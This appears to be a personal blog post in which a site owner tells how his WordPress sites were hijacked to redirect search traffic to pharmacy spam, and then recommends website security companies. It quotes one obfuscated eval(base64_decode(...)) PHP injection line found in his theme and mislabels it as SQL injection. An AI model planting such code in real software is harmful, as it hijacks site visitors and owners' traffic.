Website security is always taken for granted or neglected until it’s too late. Maybe you’re brand on the web. You worked really hard putting content together, you’ve built or created your own products and all is well.

You have your website set up and it’s ready for business and like most business owner starting on the internet, it never even crosses your mind to look into website security until it’s too late.

I know, because I’ve been there. I wouldn’t say I was neglecting website security, as probably like you right now, I was more ignorant about the issue when it came down to it. I thought I had my password secured and that everything was under control until I got hit really hard by the famous notorious “Eval(base64_decode” SQL Injection. When I realized what was going on, it was too late.

I first noticed something WAY wrong when I was recording a tutorial on how to get your name on top of the search ranking in Google in less than 10 minutes. As I was demonstrating the steps, my site got number one and when I clicked on the link, it redirected me to a pharmaceutical site and I was like: “WHAT THE”.

That’s right my Google traffic was being hijacked and re-directed to a spam site for pills. It looked like I was the one doing that. I mean, it looked like I was the one that set up my website to forward my traffic there but it was totally not the case. It’s like was set-up or framed!

I put countless hours into researching what was going on and that’s when I discovered this piece of code all over my WordPress theme.

eval(base64_decode(“iBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaaW9uOiBodHRwOi8vbWlua29mLnNlbG0KfQ0KfQ0KfQ==”))

It doesn’t look like much specially when you’re looking at your source code (your under the hood of your website), it blends right in your php code (a form computer language).

Now that I knew what to look for, I downloaded my entire site on my computer and did a search on the ten thousands of php pages that a Worpress site has. That specific line of code was there over 1,200 times. I deleted it all and re-uploaded my site, took me weeks to go through the entire process.

I got it to work again and it was working absolutely fine. The traffic was going back to my site and there was no more re-directs or hijacking. At that time I still had no idea about website security assistance, I’m more of a “DIY” do it yourself kind of guy and figure it all out so I was pretty happy. I looked at ways to make my blog more secure.

A couple months later I got hit HARD again! This time, it was no joke, it was all over the place. What I didn’t realize is that there were some back doors in the code which means that my site was always vulnerable to any further future attacks. You see WordPress is the most popular and best website building platform in my opinion hence why it’s being targeted by attackers to exploit your hard work.

Just to clarify, this was not only my site that was being infected with this, it was everybody who hadn’t made their WordPress back end updates, nor their plugin updates or anyone with vulnerabilities with no website security.

It’s not like the attacker single handed my site out and attacked me because of a personal vendetta, instead, it was an automated script that was on the hunt and attack everybody who fell under their specific parameters.

Long story short, my website security was still nonexistent. All my hard work on content to have my traffic being hijack and re-directed, giving me a bad reputation, it was just awful. To make matters worse, I was just about to be interviewed on live TV a week later for a film that I had the opportunity of doing stunts in but I couldn’t give my stunt website address, it was redirecting to these spam sites.

So I did what every website owner never wants to do. I went on and copied and pasted all my articles into a word processor and deleted my whole website, including all my other websites that were hosted on the same server.  It was a really long week. I’ve stayed up all day and night to get my stunt website back up and running so it was ready when I’d give the link out when I was on the air. All that because I never knew about website security.

Website Security Solutions

From my hosting company’s stand point, everything regarding website security looked good on their end, there was nothing wrong with the servers. It was all about the coding on my website, which essentially falls under my responsibility.

Even though your site is password protected there’s still vulnerabilities. Every time you install a new theme or plugin into your WordPress site you have the risk of jeopardizing your website security with malicious threats.

As all this was happening to me and throughout my research, I found a few companies that deal directly with website security. Man was it a relieve to talk to somebody that knew about website security.  After all, none of my friends knew what I was talking about. I really felt vulnerable, victimized and humiliated for that passed 4 months.

I wouldn’t call myself a newbie when it come to online but this was way beyond anything I’ve ever dealt with. The only concern I had when it came to hire a website security company to fix everything, is that I was somewhat reluctant and that it was a couple hundred dollars per year and I’ve never had firsthand experience with these companies before. It was all new to me.

While I was going through all that, the same thing happened to my friend’s website. He owns a business in website building and also never encountered anything like that. As soon as he got hit, he asked me what he should do as I had just spend 4 months on this and this is when I recommended these 3 companies to him. Sucuri.net, Trust-Guard.com and SiteLock.com.

Because he’s a business owner, he didn’t have time to waste, he immediately contacted the companies and went with Sucuri. He sent an e-mail for a quote, accepted it and within 24 hours, everything was FIXED! WOW, what took me 4 months to figure out, he got fixed and taken care of within 24 hours without deleting his entire websites. Until this day, his site is monitored by that company and never had any other issues.

The moral of the story is that website security is like a condom, it protects you from the threats if you were not protected. It allows you to do your business while being safe and for a few hundred bucks, it truly offers peace of mind and you know that your visitors will never end up on a pharmaceutical spam site when click on your link in the search engines

What about you, how do you view website security after learning about all this?